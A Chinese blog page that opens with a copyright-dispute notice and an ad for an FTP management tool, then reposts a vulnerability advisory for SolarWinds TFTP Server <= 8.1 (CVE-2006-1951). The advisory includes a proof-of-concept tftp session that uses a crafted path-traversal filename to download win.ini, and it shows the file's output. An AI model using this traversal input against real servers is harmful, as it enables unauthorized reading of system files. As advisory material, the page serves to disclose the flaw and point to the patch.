当前位置 博文首页 > 文章内容

    tftp 目录,TFTP Server目录遍历漏洞

    作者:Tan09wlll 栏目:Tan的日记 时间:2021-02-01 17:01:36

    本站于2023年9月4日。收到“大连君*****咨询有限公司”通知
    说我们IIS7站长博客,有一篇博文用了他们的图片。
    要求我们给他们一张图片6000元。要不然法院告我们

    为避免不必要的麻烦,IIS7站长博客,全站内容图片下架、并积极应诉
    博文内容全部不再显示,请需要相关资讯的站长朋友到必应搜索。谢谢!

    另祝:版权碰瓷诈骗团伙,早日弃暗投明。

    相关新闻:借版权之名、行诈骗之实,周某因犯诈骗罪被判处有期徒刑十一年六个月

    叹!百花齐放的时代,渐行渐远!



          IIS7批量FTP管理功能说明:

          1、可批量导入,导出FTP信息

          2、其他ftp工具有的功能,我们也有

          3、特色功能:可以定时上传下载

          4、数据信息列表化、一眼就能知道那个是那个

          5、批量连接标签页式切换方便快捷

          6、7大连接模式更多好的兼容

          7、内嵌编辑器有效解决普通txt记事本乱码

          8、锁屏功能当程序有规定时间内没人操作,则自动锁程序。输入密码才可以正常操作

          本产品适用于:懒得记录FTP信息和有批量定时备份,上传下载的运维或站长。

          下载地址:http://ftp.iis7.com/

          图片:

       

         受影响系统:   SolarWinds TFTP Server <= v8.1   不受影响系统:   SolarWinds TFTP Server v8.2   描述:   BUGTRAQ ID: 17648   CVE(CAN) ID: CVE-2006-1951   SolarWinds TFTP服务程序可以同时发送和接收多个文件,常用于下载/上传路由器、交换机等可执行映象和配置文件。   TFTP Server对大多数类似于“../filename”的请求文件名都会进行过滤,但可通过控制文件名来绕过过滤,然后下载系统上的任意文件。   <*来源:Rapid7    链接:http://www.rapid7.com/advisories/R7-0019.html   *>   测试方法:   警 告   以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!   $ tftp 192.168.0.1    tftp> get NUL/....//....//WINNT/win.ini    Received 582 bytes in 0.0 seconds    tftp> quit       $ cat win.ini    ; for 16-bit app support    [fonts]    [extensions]    [mci extensions]    [files]    [Mail]    MAPI=1   建议:   厂商补丁:   SolarWinds   目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:   solarwinds